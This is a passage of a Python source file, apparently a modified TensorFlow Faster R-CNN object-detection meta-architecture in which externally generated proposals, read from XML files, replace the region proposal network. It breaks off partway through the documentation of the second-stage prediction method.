# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Faster R-CNN meta-architecture definition.
General tensorflow implementation of Faster R-CNN detection models.
See Faster R-CNN: Ren, Shaoqing, et al.
"Faster R-CNN: Towards real-time object detection with region proposal
networks." Advances in neural information processing systems. 2015.
We allow for three modes: number_of_stages={1, 2, 3}. In case of 1 stage,
all of the user facing methods (e.g., predict, postprocess, loss) can be used as
if the model consisted only of the RPN, returning class agnostic proposals
(these can be thought of as approximate detections with no associated class
information). In case of 2 stages, proposals are computed, then passed
through a second stage "box classifier" to yield (multi-class) detections.
Finally, in case of 3 stages which is only used during eval, proposals are
computed, then passed through a second stage "box classifier" that will compute
refined boxes and classes, and then features are pooled from the refined and
non-maximum suppressed boxes and are passed through the box classifier again. If the
number of stages is 3 during training, it is automatically reduced to 2.
Implementations of Faster R-CNN models must define a new
FasterRCNNFeatureExtractor and override three methods: `preprocess`,
`_extract_proposal_features` (the first stage of the model), and
`_extract_box_classifier_features` (the second stage of the model). Optionally,
the `restore_fn` method can be overridden. See tests for an example.
A few important notes:
+ Batching conventions: We support batched inference and training where
all images within a batch have the same resolution. Batch sizes are determined
dynamically via the shape of the input tensors (rather than being specified
directly as, e.g., a model constructor argument).
A complication is that due to non-max suppression, we are not guaranteed to get
the same number of proposals from the first stage RPN (region proposal network)
for each image (though in practice, we should often get the same number of
proposals). For this reason we pad to a max number of proposals per image
within a batch. This `self.max_num_proposals` property is set to the
`first_stage_max_proposals` parameter at inference time and the
`second_stage_batch_size` at training time since we subsample the batch to
be sent through the box classifier during training.
For the second stage of the pipeline, we arrange the proposals for all images
within the batch along a single batch dimension. For example, the input to
_extract_box_classifier_features is a tensor of shape
`[total_num_proposals, crop_height, crop_width, depth]` where
total_num_proposals is batch_size * self.max_num_proposals. (And note that per
the above comment, a subset of these entries correspond to zero paddings; a short
shape sketch is given in the comment block just after this docstring.)
+ Coordinate representations:
Following the API (see model.DetectionModel definition), our outputs after
postprocessing operations are always normalized boxes; however, internally, we
sometimes convert to absolute coordinates --- e.g. for loss computation. In particular,
anchors and proposal_boxes are both represented as absolute coordinates.
Images are resized in the `preprocess` method.
The Faster R-CNN meta architecture has two post-processing methods
`_postprocess_rpn` which is applied after first stage and
`_postprocess_box_classifier` which is applied after second stage. There are
three different ways post-processing can happen depending on number_of_stages
configured in the meta architecture:
1. When number_of_stages is 1:
`_postprocess_rpn` is run as part of the `postprocess` method where
true_image_shapes is used to clip proposals, perform non-max suppression and
normalize them.
2. When number of stages is 2:
`_postprocess_rpn` is run as part of the `_predict_second_stage` method where
`resized_image_shapes` is used to clip proposals, perform non-max suppression
and normalize them. In this case `postprocess` method skips `_postprocess_rpn`
and only runs `_postprocess_box_classifier` using `true_image_shapes` to clip
detections, perform non-max suppression and normalize them.
3. When number of stages is 3:
`_postprocess_rpn` is run as part of the `_predict_second_stage` using
`resized_image_shapes` to clip proposals, perform non-max suppression and
normalize them. Subsequently, `_postprocess_box_classifier` is run as part of
`_predict_third_stage` using `true_image_shapes` to clip detections, perform
non-max suppression and normalize them. In this case, the `postprocess` method
skips both `_postprocess_rpn` and `_postprocess_box_classifier`.
"""
from abc import abstractmethod
from functools import partial
import tensorflow as tf
import json
import os
import numpy as np
from object_detection.anchor_generators import grid_anchor_generator
from object_detection.builders import box_predictor_builder
from object_detection.core import box_list
from object_detection.core import box_list_ops
from object_detection.core import box_predictor
from object_detection.core import losses
from object_detection.core import model
from object_detection.core import post_processing
from object_detection.core import standard_fields as fields
from object_detection.core import target_assigner
from object_detection.utils import ops
from object_detection.utils import shape_utils
import sys
# Make the external text-renderer utilities (data_util) importable.
sys.path.append("/notebooks/text-renderer/")
import data_util
slim = tf.contrib.slim
class FasterRCNNFeatureExtractor(object):
"""Faster R-CNN Feature Extractor definition."""
def __init__(self,
is_training,
first_stage_features_stride,
batch_norm_trainable=False,
reuse_weights=None,
weight_decay=0.0):
"""Constructor.
Args:
is_training: A boolean indicating whether the training version of the
computation graph should be constructed.
first_stage_features_stride: Output stride of extracted RPN feature map.
batch_norm_trainable: Whether to update batch norm parameters during
training or not. When training with a relatively large batch size
(e.g. 8), it could be desirable to enable batch norm update.
reuse_weights: Whether to reuse variables. Default is None.
weight_decay: float weight decay for feature extractor (default: 0.0).
"""
self._is_training = is_training
self._first_stage_features_stride = first_stage_features_stride
self._train_batch_norm = (batch_norm_trainable and is_training)
self._reuse_weights = reuse_weights
self._weight_decay = weight_decay
@abstractmethod
def preprocess(self, resized_inputs):
"""Feature-extractor specific preprocessing (minus image resizing)."""
pass
def extract_proposal_features(self, preprocessed_inputs, scope):
"""Extracts first stage RPN features.
This function is responsible for extracting feature maps from preprocessed
images. These features are used by the region proposal network (RPN) to
predict proposals.
Args:
preprocessed_inputs: A [batch, height, width, channels] float tensor
representing a batch of images.
scope: A scope name.
Returns:
rpn_feature_map: A tensor with shape [batch, height, width, depth]
activations: A dictionary mapping activation tensor names to tensors.
"""
with tf.variable_scope(scope, values=[preprocessed_inputs]):
return self._extract_proposal_features(preprocessed_inputs, scope)
@abstractmethod
def _extract_proposal_features(self, preprocessed_inputs, scope):
"""Extracts first stage RPN features, to be overridden."""
pass
def extract_box_classifier_features(self, proposal_feature_maps, scope):
"""Extracts second stage box classifier features.
Args:
proposal_feature_maps: A 4-D float tensor with shape
[batch_size * self.max_num_proposals, crop_height, crop_width, depth]
representing the feature map cropped to each proposal.
scope: A scope name.
Returns:
proposal_classifier_features: A 4-D float tensor with shape
[batch_size * self.max_num_proposals, height, width, depth]
representing box classifier features for each proposal.
"""
with tf.variable_scope(
scope, values=[proposal_feature_maps], reuse=tf.AUTO_REUSE):
return self._extract_box_classifier_features(proposal_feature_maps, scope)
@abstractmethod
def _extract_box_classifier_features(self, proposal_feature_maps, scope):
"""Extracts second stage box classifier features, to be overridden."""
pass
def restore_from_classification_checkpoint_fn(
self,
first_stage_feature_extractor_scope,
second_stage_feature_extractor_scope):
"""Returns a map of variables to load from a foreign checkpoint.
Args:
first_stage_feature_extractor_scope: A scope name for the first stage
feature extractor.
second_stage_feature_extractor_scope: A scope name for the second stage
feature extractor.
Returns:
A dict mapping variable names (to load from a checkpoint) to variables in
the model graph.
"""
variables_to_restore = {}
for variable in tf.global_variables():
for scope_name in [first_stage_feature_extractor_scope,
second_stage_feature_extractor_scope]:
if variable.op.name.startswith(scope_name):
var_name = variable.op.name.replace(scope_name + '/', '')
variables_to_restore[var_name] = variable
return variables_to_restore
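# Minimal subclassing sketch (added comment, illustrative only): a concrete feature
# extractor is expected to override `preprocess`, `_extract_proposal_features` and
# `_extract_box_classifier_features`; the layer choices below are placeholders.
#
#   class DummyFeatureExtractor(FasterRCNNFeatureExtractor):
#
#     def preprocess(self, resized_inputs):
#       # e.g. scale pixel values to [-1, 1]
#       return (2.0 / 255.0) * resized_inputs - 1.0
#
#     def _extract_proposal_features(self, preprocessed_inputs, scope):
#       features = slim.conv2d(preprocessed_inputs, 64, [3, 3], scope='rpn_feat')
#       return features, {}
#
#     def _extract_box_classifier_features(self, proposal_feature_maps, scope):
#       return slim.conv2d(proposal_feature_maps, 128, [3, 3], scope='cls_feat')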
class FasterRCNNMetaArchOverrideRPN(model.DetectionModel):
"""Faster R-CNN Meta-architecture definition."""
def __init__(self,
is_training,
num_classes,
image_resizer_fn,
feature_extractor,
number_of_stages,
first_stage_anchor_generator,
first_stage_target_assigner,
first_stage_atrous_rate,
first_stage_box_predictor_arg_scope_fn,
first_stage_box_predictor_kernel_size,
first_stage_box_predictor_depth,
first_stage_minibatch_size,
first_stage_sampler,
first_stage_nms_score_threshold,
first_stage_nms_iou_threshold,
first_stage_max_proposals,
first_stage_proposals_path,
first_stage_localization_loss_weight,
first_stage_objectness_loss_weight,
initial_crop_size,
maxpool_kernel_size,
maxpool_stride,
second_stage_target_assigner,
second_stage_mask_rcnn_box_predictor,
second_stage_batch_size,
second_stage_sampler,
second_stage_non_max_suppression_fn,
second_stage_score_conversion_fn,
second_stage_localization_loss_weight,
second_stage_classification_loss_weight,
second_stage_classification_loss,
second_stage_mask_prediction_loss_weight=1.0,
hard_example_miner=None,
parallel_iterations=16,
add_summaries=True,
use_matmul_crop_and_resize=False,
clip_anchors_to_image=False):
"""FasterRCNNMetaArch Constructor.
Args:
is_training: A boolean indicating whether the training version of the
computation graph should be constructed.
num_classes: Number of classes. Note that num_classes *does not*
include the background category, so if groundtruth labels take values
in {0, 1, .., K-1}, num_classes=K (and not K+1, even though the
assigned classification targets can range from {0,... K}).
image_resizer_fn: A callable for image resizing. This callable
takes a rank-3 image tensor of shape [height, width, channels]
(corresponding to a single image), an optional rank-3 instance mask
tensor of shape [num_masks, height, width] and returns a resized rank-3
image tensor, a resized mask tensor if one was provided in the input. In
addition this callable must also return a 1-D tensor of the form
[height, width, channels] containing the size of the true image, as the
image resizer can perform zero padding. See protos/image_resizer.proto.
feature_extractor: A FasterRCNNFeatureExtractor object.
number_of_stages: An integer taking values in {1, 2, 3}. If
1, the function will construct only the Region Proposal Network (RPN)
part of the model. If 2, the function will perform box refinement and
other auxiliary predictions all in the second stage. If 3, it will
extract features from refined boxes and perform the auxiliary
predictions on the non-maximum suppressed refined boxes.
If is_training is true and the value of number_of_stages is 3, it is
reduced to 2 since all the model heads are trained in parallel in second
stage during training.
first_stage_anchor_generator: An anchor_generator.AnchorGenerator object
(note that currently we only support
grid_anchor_generator.GridAnchorGenerator objects)
first_stage_target_assigner: Target assigner to use for first stage of
Faster R-CNN (RPN).
first_stage_atrous_rate: A single integer indicating the atrous rate for
the single convolution op which is applied to the `rpn_features_to_crop`
tensor to obtain a tensor to be used for box prediction. Some feature
extractors optionally allow for producing feature maps computed at
denser resolutions. The atrous rate is used to compensate for the
denser feature maps by using an effectively larger receptive field.
(This should typically be set to 1).
first_stage_box_predictor_arg_scope_fn: A function to construct tf-slim
arg_scope for conv2d, separable_conv2d and fully_connected ops for the
RPN box predictor.
first_stage_box_predictor_kernel_size: Kernel size to use for the
convolution op just prior to RPN box predictions.
first_stage_box_predictor_depth: Output depth for the convolution op
just prior to RPN box predictions.
first_stage_minibatch_size: The "batch size" to use for computing the
objectness and location loss of the region proposal network. This
"batch size" refers to the number of anchors selected as contributing
to the loss function for any given image within the image batch and is
only called "batch_size" due to terminology from the Faster R-CNN paper.
first_stage_sampler: Sampler to use for first stage loss (RPN loss).
first_stage_nms_score_threshold: Score threshold for non max suppression
for the Region Proposal Network (RPN). This value is expected to be in
[0, 1] as it is applied directly after a softmax transformation. The
recommended value for Faster R-CNN is 0.
first_stage_nms_iou_threshold: The Intersection Over Union (IOU) threshold
for performing Non-Max Suppression (NMS) on the boxes predicted by the
Region Proposal Network (RPN).
first_stage_max_proposals: Maximum number of boxes to retain after
performing Non-Max Suppression (NMS) on the boxes predicted by the
Region Proposal Network (RPN).
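first_stage_proposals_path: Path to the directory of XML annotation files from
which the externally generated proposals (used to override the RPN) are read
via data_util.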
first_stage_localization_loss_weight: A float
first_stage_objectness_loss_weight: A float
initial_crop_size: A single integer indicating the output size
(width and height are set to be the same) of the initial bilinear
interpolation based cropping during ROI pooling.
maxpool_kernel_size: A single integer indicating the kernel size of the
max pool op on the cropped feature map during ROI pooling.
maxpool_stride: A single integer indicating the stride of the max pool
op on the cropped feature map during ROI pooling.
second_stage_target_assigner: Target assigner to use for second stage of
Faster R-CNN. If the model is configured with multiple prediction heads,
this target assigner is used to generate targets for all heads (with the
correct `unmatched_class_label`).
second_stage_mask_rcnn_box_predictor: Mask R-CNN box predictor to use for
the second stage.
second_stage_batch_size: The batch size used for computing the
classification and refined location loss of the box classifier. This
"batch size" refers to the number of proposals selected as contributing
to the loss function for any given image within the image batch and is
only called "batch_size" due to terminology from the Faster R-CNN paper.
second_stage_sampler: Sampler to use for second stage loss (box
classifier loss).
second_stage_non_max_suppression_fn: batch_multiclass_non_max_suppression
callable that takes `boxes`, `scores`, optional `clip_window` and
optional (kwarg) `mask` inputs (with all other inputs already set)
and returns a dictionary containing tensors with keys:
`detection_boxes`, `detection_scores`, `detection_classes`,
`num_detections`, and (optionally) `detection_masks`. See
`post_processing.batch_multiclass_non_max_suppression` for the type and
shape of these tensors.
second_stage_score_conversion_fn: Callable elementwise nonlinearity
(that takes tensors as inputs and returns tensors). This is usually
used to convert logits to probabilities.
second_stage_localization_loss_weight: A float indicating the scale factor
for second stage localization loss.
second_stage_classification_loss_weight: A float indicating the scale
factor for second stage classification loss.
second_stage_classification_loss: Classification loss used by the second
stage classifier. Either losses.WeightedSigmoidClassificationLoss or
losses.WeightedSoftmaxClassificationLoss.
second_stage_mask_prediction_loss_weight: A float indicating the scale
factor for second stage mask prediction loss. This is applicable only if
second stage box predictor is configured to predict masks.
hard_example_miner: A losses.HardExampleMiner object (can be None).
parallel_iterations: (Optional) The number of iterations allowed to run
in parallel for calls to tf.map_fn.
add_summaries: boolean (default: True) controlling whether summary ops
should be added to tensorflow graph.
use_matmul_crop_and_resize: Force the use of matrix multiplication based
crop and resize instead of standard tf.image.crop_and_resize while
computing second stage input feature maps.
clip_anchors_to_image: Normally, anchors generated for a given image size
are pruned during training if they lie outside the image window. This
option clips the anchors to be within the image instead of pruning.
Raises:
ValueError: If `second_stage_batch_size` > `first_stage_max_proposals` at
training time.
ValueError: If first_stage_anchor_generator is not of type
grid_anchor_generator.GridAnchorGenerator.
"""
# TODO(rathodv): add_summaries is currently unused. Respect that directive
# in the future.
print("Running FasterRCNN with overriden RPN")
super(FasterRCNNMetaArchOverrideRPN, self).__init__(num_classes=num_classes)
# There is no RPN in this implementation!
if number_of_stages == 1:
raise ValueError('Number of stages = 1 is not allowed for overridden RPN proposals.')
if is_training and second_stage_batch_size > first_stage_max_proposals:
raise ValueError('second_stage_batch_size should be no greater than '
'first_stage_max_proposals.')
if not isinstance(first_stage_anchor_generator,
grid_anchor_generator.GridAnchorGenerator):
raise ValueError('first_stage_anchor_generator must be of type '
'grid_anchor_generator.GridAnchorGenerator.')
# Michele: externally generated proposals that override the RPN.
# Ensure the path ends with a separator before reading the XML batch.
first_stage_proposals_path = os.path.join(first_stage_proposals_path, '')
xml_root = data_util.read_xml_batch(first_stage_proposals_path)[0]['annot']
_, self.proposals = data_util.xml_to_numpy(None, xml_root)
print("Shape of overriding proposals", self.proposals.shape)
self._is_training = is_training
self._image_resizer_fn = image_resizer_fn
self._feature_extractor = feature_extractor
self._number_of_stages = number_of_stages
self._proposal_target_assigner = first_stage_target_assigner
self._detector_target_assigner = second_stage_target_assigner
# Both proposal and detector target assigners use the same box coder
self._box_coder = self._proposal_target_assigner.box_coder
# (First stage) Region proposal network parameters
self._first_stage_anchor_generator = first_stage_anchor_generator
self._first_stage_atrous_rate = first_stage_atrous_rate
self._first_stage_box_predictor_arg_scope_fn = (
first_stage_box_predictor_arg_scope_fn)
self._first_stage_box_predictor_kernel_size = (
first_stage_box_predictor_kernel_size)
self._first_stage_box_predictor_depth = first_stage_box_predictor_depth
self._first_stage_minibatch_size = first_stage_minibatch_size
self._first_stage_sampler = first_stage_sampler
self._first_stage_box_predictor = (
box_predictor_builder.build_convolutional_box_predictor(
is_training=self._is_training,
num_classes=1,
conv_hyperparams_fn=self._first_stage_box_predictor_arg_scope_fn,
use_dropout=False,
dropout_keep_prob=1.0,
box_code_size=self._box_coder.code_size,
kernel_size=1,
num_layers_before_predictor=0,
min_depth=0,
max_depth=0))
self._first_stage_nms_score_threshold = first_stage_nms_score_threshold
self._first_stage_nms_iou_threshold = first_stage_nms_iou_threshold
self._first_stage_max_proposals = first_stage_max_proposals
self._first_stage_localization_loss = (
losses.WeightedSmoothL1LocalizationLoss())
self._first_stage_objectness_loss = (
losses.WeightedSoftmaxClassificationLoss())
self._first_stage_loc_loss_weight = first_stage_localization_loss_weight
self._first_stage_obj_loss_weight = first_stage_objectness_loss_weight
# Per-region cropping parameters
self._initial_crop_size = initial_crop_size
self._maxpool_kernel_size = maxpool_kernel_size
self._maxpool_stride = maxpool_stride
self._mask_rcnn_box_predictor = second_stage_mask_rcnn_box_predictor
self._second_stage_batch_size = second_stage_batch_size
self._second_stage_sampler = second_stage_sampler
self._second_stage_nms_fn = second_stage_non_max_suppression_fn
self._second_stage_score_conversion_fn = second_stage_score_conversion_fn
self._second_stage_localization_loss = (
losses.WeightedSmoothL1LocalizationLoss())
self._second_stage_classification_loss = second_stage_classification_loss
self._second_stage_mask_loss = (
losses.WeightedSigmoidClassificationLoss())
self._second_stage_loc_loss_weight = second_stage_localization_loss_weight
self._second_stage_cls_loss_weight = second_stage_classification_loss_weight
self._second_stage_mask_loss_weight = (
second_stage_mask_prediction_loss_weight)
self._use_matmul_crop_and_resize = use_matmul_crop_and_resize
self._hard_example_miner = hard_example_miner
self._parallel_iterations = parallel_iterations
self.clip_anchors_to_image = clip_anchors_to_image
if self._number_of_stages <= 0 or self._number_of_stages > 3:
raise ValueError('Number of stages should be a value in {1, 2, 3}.')
@property
def first_stage_feature_extractor_scope(self):
return 'FirstStageFeatureExtractor'
@property
def second_stage_feature_extractor_scope(self):
return 'SecondStageFeatureExtractor'
@property
def first_stage_box_predictor_scope(self):
return 'FirstStageBoxPredictor'
@property
def second_stage_box_predictor_scope(self):
return 'SecondStageBoxPredictor'
@property
def max_num_proposals(self):
"""Max number of proposals (to pad to) for each image in the input batch.
At training time, this is set to be the `second_stage_batch_size` if hard
example miner is not configured, else it is set to the number of externally
supplied proposals (`self.proposals.shape[1]`). At inference time, it is always
the number of externally supplied proposals.
Returns:
A positive integer.
"""
if self._is_training and not self._hard_example_miner:
return self._second_stage_batch_size
#return self._first_stage_max_proposals
return self.proposals.shape[1]
@property
def anchors(self):
if not self._anchors:
raise RuntimeError('anchors have not been constructed yet!')
if not isinstance(self._anchors, box_list.BoxList):
raise RuntimeError('anchors should be a BoxList object, but is not.')
return self._anchors
def preprocess(self, inputs):
"""Feature-extractor specific preprocessing.
See base class.
For Faster R-CNN, we perform image resizing in the base class --- each
class subclassing FasterRCNNMetaArch is responsible for any additional
preprocessing (e.g., scaling pixel values to be in [-1, 1]).
Args:
inputs: a [batch, height_in, width_in, channels] float tensor representing
a batch of images with values between 0 and 255.0.
Returns:
preprocessed_inputs: a [batch, height_out, width_out, channels] float
tensor representing a batch of images.
true_image_shapes: int32 tensor of shape [batch, 3] where each row is
of the form [height, width, channels] indicating the shapes
of true images in the resized images, as resized images can be padded
with zeros.
Raises:
ValueError: if inputs tensor does not have type tf.float32
"""
if inputs.dtype is not tf.float32:
raise ValueError('`preprocess` expects a tf.float32 tensor')
with tf.name_scope('Preprocessor'):
outputs = shape_utils.static_or_dynamic_map_fn(
self._image_resizer_fn,
elems=inputs,
dtype=[tf.float32, tf.int32],
parallel_iterations=self._parallel_iterations)
resized_inputs = outputs[0]
true_image_shapes = outputs[1]
return (self._feature_extractor.preprocess(resized_inputs),
true_image_shapes)
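# Usage sketch (added comment; variable names are placeholders):
#   images = tf.placeholder(tf.float32, [None, None, None, 3])
#   preprocessed, true_shapes = model.preprocess(images)
#   prediction_dict = model.predict(preprocessed, true_shapes)
#   detections = model.postprocess(prediction_dict, true_shapes)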
def _compute_clip_window(self, image_shapes):
"""Computes clip window for non max suppression based on image shapes.
This function assumes that the clip window's left top corner is at (0, 0).
Args:
image_shapes: A 2-D int32 tensor of shape [batch_size, 3] containing
shapes of images in the batch. Each row represents [height, width,
channels] of an image.
Returns:
A 2-D float32 tensor of shape [batch_size, 4] containing the clip window
for each image in the form [ymin, xmin, ymax, xmax].
"""
clip_heights = image_shapes[:, 0]
clip_widths = image_shapes[:, 1]
clip_window = tf.to_float(tf.stack([tf.zeros_like(clip_heights),
tf.zeros_like(clip_heights),
clip_heights, clip_widths], axis=1))
return clip_window
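# Illustrative example (added comment): for image_shapes = [[480, 640, 3],
# [600, 800, 3]] the returned clip windows are [[0., 0., 480., 640.],
# [0., 0., 600., 800.]], i.e. [ymin, xmin, ymax, xmax] with the top-left
# corner at (0, 0).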
def predict(self, preprocessed_inputs, true_image_shapes):
"""Predicts unpostprocessed tensors from input tensor.
This function takes an input batch of images and runs it through the
forward pass of the network to yield "raw" un-postprocessed predictions.
If `number_of_stages` is 1, this function only returns first stage
RPN predictions (un-postprocessed). Otherwise it returns both
first stage RPN predictions as well as second stage box classifier
predictions.
Other remarks:
+ Anchor pruning vs. clipping: following the recommendation of the Faster
R-CNN paper, we prune anchors that venture outside the image window at
training time and clip anchors to the image window at inference time.
+ Proposal padding: as described at the top of the file, proposals are
padded to self._max_num_proposals and flattened so that proposals from all
images within the input batch are arranged along the same batch dimension.
Args:
preprocessed_inputs: a [batch, height, width, channels] float tensor
representing a batch of images.
true_image_shapes: int32 tensor of shape [batch, 3] where each row is
of the form [height, width, channels] indicating the shapes
of true images in the resized images, as resized images can be padded
with zeros.
Returns:
prediction_dict: a dictionary holding "raw" prediction tensors:
1) rpn_box_predictor_features: A 4-D float32 tensor with shape
[batch_size, height, width, depth] to be used for predicting proposal
boxes and corresponding objectness scores.
2) rpn_features_to_crop: A 4-D float32 tensor with shape
[batch_size, height, width, depth] representing image features to crop
using the proposal boxes predicted by the RPN.
3) image_shape: a 1-D tensor of shape [4] representing the input
image shape.
4) rpn_box_encodings: 3-D float tensor of shape
[batch_size, num_anchors, self._box_coder.code_size] containing
predicted boxes.
5) rpn_objectness_predictions_with_background: 3-D float tensor of shape
[batch_size, num_anchors, 2] containing class
predictions (logits) for each of the anchors. Note that this
tensor *includes* background class predictions (at class index 0).
6) anchors: A 2-D tensor of shape [num_anchors, 4] representing anchors
for the first stage RPN (in absolute coordinates). Note that
`num_anchors` can differ depending on whether the model is created in
training or inference mode.
(and if number_of_stages > 1):
7) refined_box_encodings: a 3-D tensor with shape
[total_num_proposals, num_classes, self._box_coder.code_size]
representing predicted (final) refined box encodings, where
total_num_proposals=batch_size*self._max_num_proposals. If using
a shared box across classes the shape will instead be
[total_num_proposals, 1, self._box_coder.code_size].
8) class_predictions_with_background: a 3-D tensor with shape
[total_num_proposals, num_classes + 1] containing class
predictions (logits) for each of the anchors, where
total_num_proposals=batch_size*self._max_num_proposals.
Note that this tensor *includes* background class predictions
(at class index 0).
9) num_proposals: An int32 tensor of shape [batch_size] representing the
number of proposals generated by the RPN. `num_proposals` allows us
to keep track of which entries are to be treated as zero paddings and
which are not since we always pad the number of proposals to be
`self.max_num_proposals` for each image.
10) proposal_boxes: A float32 tensor of shape
[batch_size, self.max_num_proposals, 4] representing
decoded proposal bounding boxes in absolute coordinates.
11) mask_predictions: (optional) a 4-D tensor with shape
[total_num_padded_proposals, num_classes, mask_height, mask_width]
containing instance mask predictions.
Raises:
ValueError: If `predict` is called before `preprocess`.
"""
'''(rpn_box_predictor_features, rpn_features_to_crop, anchors_boxlist,
image_shape) = self._extract_rpn_feature_maps(preprocessed_inputs)'''
print("Predict running")
image_shape = tf.shape(preprocessed_inputs)
rpn_features_to_crop, _ = self._feature_extractor.extract_proposal_features(
preprocessed_inputs, scope=self.first_stage_feature_extractor_scope)
#(rpn_box_encodings, rpn_objectness_predictions_with_background
#) = self._predict_rpn_proposals(rpn_box_predictor_features)
# The Faster R-CNN paper recommends pruning anchors that venture outside
# the image window at training time and clipping at inference time.
'''clip_window = tf.to_float(tf.stack([0, 0, image_shape[1], image_shape[2]]))
if self._is_training:
if self.clip_anchors_to_image:
anchors_boxlist = box_list_ops.clip_to_window(
anchors_boxlist, clip_window, filter_nonoverlapping=False)
else:
(rpn_box_encodings, rpn_objectness_predictions_with_background,
anchors_boxlist) = self._remove_invalid_anchors_and_predictions(
rpn_box_encodings, rpn_objectness_predictions_with_background,
anchors_boxlist, clip_window)
else:
anchors_boxlist = box_list_ops.clip_to_window(
anchors_boxlist, clip_window)
self._anchors = anchors_boxlist'''
prediction_dict = {
#'rpn_box_predictor_features': rpn_box_predictor_features,
'rpn_features_to_crop': rpn_features_to_crop,
'image_shape': image_shape,
#'rpn_box_encodings': rpn_box_encodings,
#'rpn_objectness_predictions_with_background':
#rpn_objectness_predictions_with_background,
#'anchors': self._anchors.get()
}
if self._number_of_stages >= 2:
'''prediction_dict.update(self._predict_second_stage(
rpn_box_encodings,
rpn_objectness_predictions_with_background,
rpn_features_to_crop,
self._anchors.get(), image_shape, true_image_shapes))'''
prediction_dict.update(self._predict_second_stage(
rpn_features_to_crop, image_shape, true_image_shapes))
if self._number_of_stages == 3:
prediction_dict = self._predict_third_stage(
prediction_dict, true_image_shapes)
return prediction_dict
def _image_batch_shape_2d(self, image_batch_shape_1d):
"""Takes a 1-D image batch shape tensor and converts it to a 2-D tensor.
Example:
If the 1-D image batch shape tensor is [2, 300, 300, 3], the corresponding 2-D
image batch shape tensor would be [[300, 300, 3], [300, 300, 3]].
Args:
image_batch_shape_1d: 1-D tensor of the form [batch_size, height,
width, channels].
Returns:
image_batch_shape_2d: 2-D tensor of shape [batch_size, 3] where each row is
of the form [height, width, channels].
"""
return tf.tile(tf.expand_dims(image_batch_shape_1d[1:], 0),
[image_batch_shape_1d[0], 1])
'''def _predict_second_stage(self, rpn_box_encodings,
rpn_objectness_predictions_with_background,
rpn_features_to_crop,
anchors,
image_shape,
true_image_shapes):
"""Predicts the output tensors from second stage of Faster R-CNN.
Args:
rpn_box_encodings: 4-D float tensor of shape
[batch_size, num_valid_anchors, self._box_coder.code_size] containing
predicted boxes.
rpn_objectness_predictions_with_background: 2-D float tensor of shape
[batch_size, num_valid_anchors, 2] containing class
predictions (logits) for each of the anchors. Note that this
tensor *includes* background class predictions (at class index 0).
rpn_features_to_crop: A 4-D float32 tensor with shape
[batch_size, height, width, depth] representing image features to crop
using the proposal boxes predicted by the RPN.
anchors: 2-D float tensor of shape
[num_anchors, self._box_coder.code_size].
image_shape: A 1D int32 tensors of size [4] containing the image shape.
true_image_shapes: int32 tensor of shape [batch, 3] where each row is
of the form [height, width, channels] indicating the shapes
of true images in the resized images, as resized images can be padded
with zeros.
Returns:
prediction_dict: a dictionary holding "raw" prediction tensors:
1) refined_box_encodings: a 3-D tensor with shape
[total_num_proposals, num_classes, self._box_coder.code_size]
representing predicted (final) refined box encodings, where
total_num_proposals=batch_size*self._max_num_proposals. If using a
shared box across classes the shape will instead be
[total_num_proposals, 1, self._box_coder.code_size].
2) class_predictions_with_background: a 3-D tensor with shape
[total_num_proposals, num_classes + 1] containing class
predictions (logits) for each of the anchors, where
total_num_proposals=batch_size*self._max_num_proposals.
Note that this tensor *includes* background class predictions
(at class index 0).
3) num_proposals: An int32 tensor of shape [batch_size] representing the
number of proposals generated by the RPN. `num_proposals` allows us
to keep track of which entries are to be treated as zero paddings and
which are not since we always pad the number of proposals to be
`self.max_num_proposals` for each image.
4) proposal_boxes: A float32 tensor of shape
[batch_size, self.max_num_proposals, 4] representing
decoded proposal bounding boxes in absolute coordinates.
5) proposal_boxes_normalized: A float32 tensor of shape
[batch_size, self.max_num_proposals, 4] representing decoded proposal
bounding boxes in normalized coordinates. Can be used to override the
boxes proposed by the RPN, thus enabling one to extract features and
get box classification and prediction for externally selected areas
of the image.
6) box_classifier_features: a 4-D float32 tensor representing the
features for each proposal.
"""
image_shape_2d = self._image_batch_shape_2d(image_shape)
proposal_boxes_normalized, _, num_proposals = self._postprocess_rpn(
rpn_box_encodings, rpn_objectness_predictions_with_background,
anchors, image_shape_2d, true_image_shapes)
# Override RPN proposals
# proposal_boxes_normalized = tf.Print(proposal_boxes_normalized, [], message=("original size= " + str(proposal_boxes_normalized.shape[1])))
# proposal_boxes_normalized = tf.constant(self.proposals, dtype='float32')
flattened_proposal_feature_maps = (
self._compute_second_stage_input_feature_maps(
rpn_features_to_crop, proposal_boxes_normalized))
box_classifier_features = (
self._feature_extractor.extract_box_classifier_features(
flattened_proposal_feature_maps,
scope=self.second_stage_feature_extractor_scope))
if self._mask_rcnn_box_predictor.is_keras_model:
box_predictions = self._mask_rcnn_box_predictor(
[box_classifier_features],
prediction_stage=2)
else:
box_predictions = self._mask_rcnn_box_predictor.predict(
[box_classifier_features],
num_predictions_per_location=[1],
scope=self.second_stage_box_predictor_scope,
prediction_stage=2)
refined_box_encodings = tf.squeeze(
box_predictions[box_predictor.BOX_ENCODINGS],
axis=1, name='all_refined_box_encodings')
class_predictions_with_background = tf.squeeze(
box_predictions[box_predictor.CLASS_PREDICTIONS_WITH_BACKGROUND],
axis=1, name='all_class_predictions_with_background')
absolute_proposal_boxes = ops.normalized_to_image_coordinates(
proposal_boxes_normalized, image_shape, self._parallel_iterations)
prediction_dict = {
'refined_box_encodings': refined_box_encodings,
'class_predictions_with_background':
class_predictions_with_background,
'num_proposals': num_proposals,
'proposal_boxes': absolute_proposal_boxes,
'box_classifier_features': box_classifier_features,
'proposal_boxes_normalized': proposal_boxes_normalized,
}
return prediction_dict'''
def _predict_second_stage(self, rpn_features_to_crop,
image_shape,
true_image_shapes):
"""Predicts the output tensors from second stage of Faster R-CNN.
Args:
rpn_features_to_crop: A 4-D float32 tensor with shape
[batch_size, height, width, depth] representing image features to crop
using the proposal boxes predicted by the RPN.
image_shape: A 1-D int32 tensor of size [4] containing the image shape.
true_image_shapes: int32 tensor of shape [batch, 3] where each row is
of the form [height, width, channels] indicating the shapes
of true images in the resized images, as resized images can be padded
with zeros.
Returns:
prediction_dict: a dictionary holding "raw" prediction tensors:
1) refined_box_encodings: a 3-D tensor with shape
[total_num_proposals, num_classes, self._box_coder.code_size]
